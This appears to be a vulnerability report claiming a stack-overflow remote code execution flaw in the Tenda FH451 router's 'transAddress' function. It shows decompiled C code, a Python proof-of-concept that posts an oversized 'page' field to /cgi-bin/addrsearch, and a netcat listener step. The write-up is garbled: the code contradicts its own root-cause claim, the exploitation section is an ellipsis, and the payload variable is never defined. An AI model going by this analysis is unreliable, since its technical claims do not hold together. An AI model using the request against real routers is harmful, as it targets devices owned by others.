### Critical Vulnerability Information #### Vulnerability Description - **Vendor**: Shenzhen Jixiang Tengda Technology Co., Ltd. - **Product**: FH451 - **Vulnerability Type**: Remote Code Execution (RCE) #### Vulnerability Analysis - **Problematic Function**: `transAddress` - **Problematic Code**: ```c int _fastcall transAddress(int a1) { int v2; // [sp+0h] [bp-38h] char *v3; // [sp+4h] [bp-34h] char s[52]; // [sp+8h] [bp-30h] const char *v6; // [sp+38h] [bp-0h] char *v7; // [sp+3Ch] [bp-4h] v6 = "page"; v7 = ""; if ( !strcmp(v6, "entry") && strcmp(a1, "") ) { strcpy(s, "index"); strcat(s, ".php"); return s; } sscanf(a1, "%s", &v7); strcat(s, v7); strcat(s, ".php"); return s; } ``` - **Root Cause**: The function directly uses the user-supplied `page` parameter without any length validation. When the `page` parameter is excessively large, it causes a stack overflow in the `sscanf` function at line 15, potentially leading to remote code execution. #### Exploitation Method - **Exploitation Function**: `sub_6D6C` - **Critical Code**: ```c sub_6D6C: ... ``` #### Payload - **Example Code**: ```python import requests url = 'http://0.0.0.0/cgi-bin/addrsearch' data = {'page': payload} res = requests.post(url, data=data) ``` #### Reproduction Steps - **Command Line Operations**: ```bash nc -lvp 80 python address.py ``` #### Result - **Crash Message**: ``` Segmentation fault ``` ``` This information indicates that the device is vulnerable to a severe remote code execution flaw. Attackers can trigger a stack overflow by crafting specific request parameters, thereby executing arbitrary code.